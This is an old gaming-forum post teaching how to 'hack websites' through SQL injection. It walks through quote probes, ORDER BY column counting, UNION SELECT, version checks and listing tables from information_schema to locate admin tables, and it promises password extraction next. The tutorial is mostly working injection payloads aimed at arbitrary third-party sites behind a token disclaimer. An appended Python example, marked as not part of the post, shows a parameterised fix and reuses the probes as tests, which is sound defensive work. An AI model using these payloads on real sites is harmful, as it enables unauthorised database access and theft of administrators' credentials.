Repsawn Gaming
[TUT] How to hack websites


Post by Astonix Sat Apr 24, 2010 7:04 pm

**This is purely for educational and entertainment reasons. I do not condone anyone using this guide for illegal purposes**


Well, I will be teaching the easiest way to hack a website, this is via SQL injection (SQLi). A good way to prepare for this learning is reading up on how MySQL works, even downloading it, and working with it yourself.

1) Find a vuln. website - This means finding a website vulnerable to SQLi. You can check this by looking for pages with an '=' sign. This means it's taking information from a database, meaning you have a potential exploitation area. To check it, use the ' rule.

Example: www.examplesite.com/pageid=1' or www.examplesite.com/pageid='1

2) If it is vuln then you should get 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc...' If not, move on to a different site.

3) Now to check how many columns are in the table. To do this we want to use the order by command, starting with 1, 2 then maybe jumping to 10. We do this until we get an error. Say we get no error on 1 or 2, but an error on 10, come down to 5 or so. We must also use the -- or /* rule. Both mean the same, but sometimes either one or the other works. There are more types of these rules; Google is your friend.

Example: www.examplesite.com/pageid=1 order by 1-- or www.examplesite.com/pageid=1 order by 1/*
No errors on these

Example: www.examplesite.com/pageid=1 order by 5-- or www.examplesite.com/pageid=5/*
Error on this one, so we try;

Example: www.examplesite.com/pageid=1 order by 4-- or www.examplesite.com/pageid=4/*
No error here. There are 4 columns.

4) Now check that the Union function works. The union function allows us to group multiple columns, rows, etc. together. Union all the columns you have. After doing this, you should see at least one number display.

Example: www.examplesite.com/pageid=1 union all select 1,2,3,4-- or www.examplesite.com/pageid=1 union all select 1,2,3,4/*
In this case, number 2 shows up.

5) Now we must check for the MySQL version, as this decides which technique we will use next: blind SQLi, or in my terms, normal. If it's more than version 5, we use the classic technique; if it's less than 5, you use blind SQLi and I'm not going over that in this tut. Anyway, to check for the version, remember what number was displayed from the previous union all select command, then replace that number with @@version but keeping the rest of the column numbers.

Example: www.examplesite.com/pageid=1 1,@@version,3,4-- or www.examplesite.com/pageid=1 1,@@version,3,4/*
The version will now show up and hopefully it's more than 5.

6) Now to find the table names. We will be asking the database to give us all the table names from table name list by replacing our vuln column number (in this case, 2) with table_names and using the from command for information_schema.tables.

Example: www.examplesite.com/pageid=1 1,table_name,3,4 from information_schema.tables
A list of table names displays. Look for admin, administrators etc. In this case, it's admin.

To be continued
Selecting columns from the tables
Using column names to combine admins and their passwords
How to stay safe
Voila.
Astonix
Head & Tech Admin

Location : UK
Posts : 674
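
An added example, not part of the original post: the page-id lookup the tutorial probes, written once with string concatenation and once with input validation plus a bound parameter, with the post's own probe strings used as regression inputs. It assumes SQLite from the Python standard library as a stand-in for MySQL; the table layout and the names `get_page_vulnerable`, `get_page_safe` and `classify` are hypothetical.

```python
import sqlite3

# Constructed sample data: a 4-column content table like the one in the post,
# plus an admin table that must never be reachable through the page lookup.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        CREATE TABLE admin (username TEXT, password_hash TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome', 'staff');
        INSERT INTO admin VALUES ('root', 'constructed-hash');
    """)
    return db

def get_page_vulnerable(db, raw_id):
    # Anti-pattern: the request value becomes part of the SQL text itself.
    return db.execute("SELECT * FROM pages WHERE id = " + raw_id).fetchall()

def get_page_safe(db, raw_id):
    # 1) Allow-list the input: a page id is a short run of ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # caller answers with a plain 404, never the DB error text
    # 2) Bind the value as a parameter so it can only ever be data.
    return db.execute("SELECT * FROM pages WHERE id = ?", (int(raw_id),)).fetchall()

def classify(db, handler, raw_id):
    """Report what a client would observe: 'rows:N', 'rejected', or 'sql-error'."""
    try:
        rows = handler(db, raw_id)
    except sqlite3.Error:
        return "sql-error"  # in the post, this leaked error is the vulnerability tell
    return "rejected" if rows is None else f"rows:{len(rows)}"

# The post's own probe strings, used here as regression inputs.
PROBES = ["1", "1'", "1 order by 5--", "1 union all select 1,2,3,4--"]

def run():
    db = make_db()
    return {p: (classify(db, get_page_vulnerable, p), classify(db, get_page_safe, p))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (vuln, safe) in run().items():
        print(f"{probe!r:35} vulnerable={vuln:10} safe={safe}")
```

With the safe handler every probe is rejected before it reaches the database, so there is no syntax error to observe and no extra row to read; the same probe list can be kept as a regression test for any handler that takes an id from the URL.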
